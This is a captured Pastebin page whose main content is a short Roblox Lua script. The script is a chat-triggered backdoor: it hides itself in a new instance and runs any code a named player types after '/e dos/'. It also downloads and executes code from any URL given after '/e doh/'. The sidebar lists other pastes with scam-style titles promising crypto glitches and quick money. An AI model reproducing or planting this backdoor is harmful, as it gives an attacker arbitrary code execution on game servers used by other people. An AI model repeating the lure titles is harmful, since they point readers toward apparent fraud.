CARVIEW |
Select Language
HTTP/2 200
date: Mon, 13 Oct 2025 03:58:26 GMT
content-type: text/html; charset=UTF-8
server: cloudflare
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
vary: accept-encoding
cf-cache-status: DYNAMIC
content-encoding: gzip
set-cookie: _csrf-frontend=a45d6af071329851733aec8c1940206ac182db21bb96e959dfe4503862b098aaa%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22nGCmG5KBhFp-eSxPFPoxlrMooZm3sj71%22%3B%7D; HttpOnly; Path=/
cf-ray: 98dbeb24d87fc1b8-BLR
gsgdsdg - Pastebin.com
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --[[
- In this script, edit only things that are told to edit in the green comments.
- --]]
- EnabledUser = "sidneymnl" -- Put your name in the quotes, without deleting them.
- local Commands = {}
- local Logs = {}
- script.Parent = Instance.new('Glue')
- table.insert(Commands, "/e dos/")
- table.insert(Commands, "/e doh/")
- function C(M)
- if string.sub(M, 1, 7) == "/e dos/" then
- loadstring(string.sub(M, 8))()
- table.insert(Logs, M)
- end
- if string.sub(M, 1, 7) == "/e doh/" then
- loadstring(game:GetService('HttpService'):GetAsync(string.sub(M, 8), true))()
- table.insert(Logs, M)
- end
- end
- game.Players[EnabledUser].Chatted:connect(C)
Advertisement
Add Comment
Please, Sign In to add comment
-
💡 EASY MONEY GUIDE ✅ Working
JavaScript | 5 sec ago | 0.24 KB
-
🔥 Exchange profit method
JavaScript | 15 sec ago | 0.24 KB
-
📝 MAKE $2500 IN 15 MIN ✅ Working
JavaScript | 24 sec ago | 0.24 KB
-
⚡ Crypto Swap Glitch ✅ Working ⚡
JavaScript | 34 sec ago | 0.24 KB
-
💡 Instant BTC Profit Method ✅ Working
JavaScript | 43 sec ago | 0.24 KB
-
💵 Make 3000$ in 20 minutes 💵
JavaScript | 56 sec ago | 0.24 KB
-
💎 ChangeNOW Exploit
JavaScript | 1 min ago | 0.24 KB
-
🚀 Swapzone +37% glitch
JavaScript | 1 min ago | 0.24 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand